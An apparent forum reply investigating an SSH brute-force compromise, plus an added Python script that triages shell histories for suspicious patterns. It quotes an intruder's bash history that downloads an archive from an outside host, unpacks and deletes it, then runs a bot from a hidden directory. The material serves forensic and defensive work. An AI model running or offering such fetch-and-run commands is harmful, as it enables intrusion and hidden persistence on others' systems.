Re: brute force ssh attack

>Were there any interesting files in the users' home directories? (Look for
>hidden files too, of course -- maybe a hidden directory named ... or
>something.) Also check in /tmp and /var. And any luck with the
>.bash_history? (For both the users and for root....)

This is ~daikanyama/.bash_history:
passwd
ls
w
wget www.ring.as.ro/x/qwe.tgz
tar zxvf qwe.tgz
rm -rf qwe.tgz
cd .undernet
./mech
./mech
./mech
./mech

There is a complex directory tree under ~daikanyama/.undernet.

There are no interesting files under ~kevin.
Kevin had tcsh as login shell. Using ps aux, I have seen that kevin
used ftp, and kevin also used passwd.

One of the users compiled something; I have seen that they utilized
"make". Kevin installed some program, psybnc, under /var/tmp.

There is nothing interesting in /tmp and /root (root has tcsh as
login shell).









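The checks discussed in this thread (shell history, hidden directories), as an added example that is not part of the original post: a Python triage pass over a .bash_history file that flags the patterns visible in the history quoted above. The rule names and the heuristics (only the last cd target is tracked, any dot-directory counts as hidden) are assumptions made for this illustration.

```python
import posixpath
import re
import shlex

FETCHERS = {"wget", "curl", "ftp", "lynx"}
EXTRACTORS = {"tar", "unzip", "gunzip"}
ARCHIVE = re.compile(r"\.(tgz|tar\.gz|tar\.bz2|tar|zip)$")

def is_hidden(path):
    """True if any path component is a dot-name other than '.' or '..'."""
    return any(p.startswith(".") and p not in (".", "..") for p in path.split("/"))

def triage_history(lines):
    """Return (line_no, rule, command) findings for one shell history file."""
    findings, state, cwd_hidden = [], {}, False
    for no, raw in enumerate(lines, 1):
        cmd = raw.strip()
        try:
            argv = shlex.split(cmd)
        except ValueError:          # unbalanced quotes: fall back to a plain split
            argv = cmd.split()
        if not argv:
            continue
        prog = posixpath.basename(argv[0])
        names = [posixpath.basename(a.rstrip("/")) for a in argv[1:] if not a.startswith("-")]
        if prog == "passwd":        # password change on a possibly hijacked account
            findings.append((no, "password-change", cmd))
        elif prog in FETCHERS:      # archive pulled from the network
            for n in filter(ARCHIVE.search, names):
                state[n] = "fetched"
                findings.append((no, "archive-download", cmd))
        elif prog in EXTRACTORS:    # remember that a fetched archive was unpacked
            state.update((n, "extracted") for n in names if n in state)
        elif prog == "rm" and any(state.get(n) == "extracted" for n in names):
            findings.append((no, "fetch-extract-delete", cmd))
        elif prog == "cd":
            cwd_hidden = len(argv) > 1 and is_hidden(argv[1])  # last target only
            if cwd_hidden:
                findings.append((no, "cd-hidden-dir", cmd))
        elif is_hidden(argv[0]) or (cwd_hidden and argv[0].startswith("./")):
            findings.append((no, "exec-in-hidden-dir", cmd))
    return findings

# The history quoted in the post above, used as sample input.
SAMPLE = ("passwd\nls\nw\nwget www.ring.as.ro/x/qwe.tgz\ntar zxvf qwe.tgz\n"
          "rm -rf qwe.tgz\ncd .undernet\n./mech\n./mech\n./mech\n./mech\n").splitlines()

if __name__ == "__main__":
    print(*triage_history(SAMPLE), sep="\n")
```

Legitimate dot-directories such as ~/.ssh will also trigger the hidden-directory rules, so the output is a list of lines to read, not a verdict.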

